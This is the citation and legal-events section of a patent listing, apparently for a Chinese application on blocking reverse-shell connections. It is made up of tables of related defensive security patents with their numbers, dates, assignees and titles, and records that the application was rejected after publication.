| CN113918955A (zh) * | 2021-09-29 | 2022-01-11 | 杭州默安科技有限公司 | 一种linux内核漏洞权限提升检测阻断方法和系统 |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN107423622A (zh) * | 2017-07-04 | 2017-12-01 | 上海高重信息科技有限公司 | 一种检测和防范反弹shell的方法和系统 |
| WO2018038990A2 (en) * | 2016-08-26 | 2018-03-01 | Qualcomm Incorporated | Detection and prevention of malicious shell exploits |
| CN107770133A (zh) * | 2016-08-19 | 2018-03-06 | 北京升鑫网络科技有限公司 | 一种适应性webshell检测方法及系统 |
-
2019
- 2019-03-28 CN CN201910245774.3A patent/CN110166420A/zh active Pending
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN107770133A (zh) * | 2016-08-19 | 2018-03-06 | 北京升鑫网络科技有限公司 | 一种适应性webshell检测方法及系统 |
| WO2018038990A2 (en) * | 2016-08-26 | 2018-03-01 | Qualcomm Incorporated | Detection and prevention of malicious shell exploits |
| CN107423622A (zh) * | 2017-07-04 | 2017-12-01 | 上海高重信息科技有限公司 | 一种检测和防范反弹shell的方法和系统 |
Non-Patent Citations (1)
| Title |
|---|
| ZHANGHAOYIL: "《自动化反弹Shell防御技术》", 《FREEBUF》 * |
Cited By (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113449298A (zh) * | 2020-03-24 | 2021-09-28 | 百度在线网络技术(北京)有限公司 | 一种反弹shell进程的检测方法、装置、设备和介质 |
| CN113449298B (zh) * | 2020-03-24 | 2023-09-05 | 百度在线网络技术(北京)有限公司 | 一种反弹shell进程的检测方法、装置、设备和介质 |
| CN113761527A (zh) * | 2020-07-01 | 2021-12-07 | 北京沃东天骏信息技术有限公司 | 一种反弹shell进程检测方法、装置、设备及存储介质 |
| CN113515743A (zh) * | 2021-03-23 | 2021-10-19 | 杭州安恒信息技术股份有限公司 | 反弹shell进程调用链的识别方法、装置和电子装置 |
| CN113515743B (zh) * | 2021-03-23 | 2024-03-19 | 杭州安恒信息技术股份有限公司 | 反弹shell进程调用链的识别方法、装置和电子装置 |
| CN113139193A (zh) * | 2021-04-23 | 2021-07-20 | 杭州安恒信息技术股份有限公司 | 一种反弹shell风险判定方法、装置和系统 |
| CN113918955A (zh) * | 2021-09-29 | 2022-01-11 | 杭州默安科技有限公司 | 一种linux内核漏洞权限提升检测阻断方法和系统 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN110138727A (zh) | 反弹shell网络连接的信息查找方法及装置 | |
| CN110166420A (zh) | 反弹shell阻断方法及装置 | |
| US10587647B1 (en) | Technique for malware detection capability comparison of network security devices | |
| JP6745921B2 (ja) | Plcの仮想的なパッチおよびセキュリティコンテキストの自動配信 | |
| CN110099044A (zh) | 云主机安全检测系统及方法 | |
| US20170111391A1 (en) | Enhanced intrusion prevention system | |
| CN112653654A (zh) | 安全监控方法、装置、计算机设备及存储介质 | |
| EP3474174B1 (en) | System and method of adapting patterns of dangerous behavior of programs to the computer systems of users | |
| CN110417768B (zh) | 一种僵尸网络的跟踪方法及装置 | |
| CN112653655A (zh) | 汽车安全通信控制方法、装置、计算机设备及存储介质 | |
| CN103975331B (zh) | 并入了被管理基础设施设备的安全的数据中心基础设施管理系统 | |
| US20190109824A1 (en) | Rule enforcement in a network | |
| WO2020016834A1 (en) | Systems and methods for reporting computer security incidents | |
| JP2023550974A (ja) | イメージ基盤悪性コード検知方法および装置とこれを利用する人工知能基盤エンドポイント脅威検知および対応システム | |
| US20190121975A1 (en) | System and method for adapting patterns of malicious program behavior from groups of computer systems | |
| EP3042284A1 (fr) | Moyens de protection pour systèmes informatiques industriels | |
| CN116633694B (zh) | 一种基于多模异构组件的web防御方法与系统 | |
| KR102022626B1 (ko) | 로그 분석을 이용한 공격 탐지 장치 및 방법 | |
| CN104484608A (zh) | 一种应用程序的消息处理方法和装置 | |
| CN114629686A (zh) | 一种漏洞攻击检测方法及装置 | |
| CN113709130A (zh) | 基于蜜罐系统的风险识别方法及装置 | |
| KR20220073657A (ko) | 이미지 기반 악성코드 탐지 방법 및 장치와 이를 이용하는 인공지능 기반 엔드포인트 위협탐지 및 대응 시스템 | |
| EP2815350A2 (en) | Methods, systems, and media for inhibiting attacks on embedded devices | |
| KR102102524B1 (ko) | 서버와 서버간에 서비스 제공을 위한 망내 운영방법 및 시스템 | |
| CN113127855A (zh) | 安全防护系统及方法 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| RJ01 | Rejection of invention patent application after publication | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20190823 |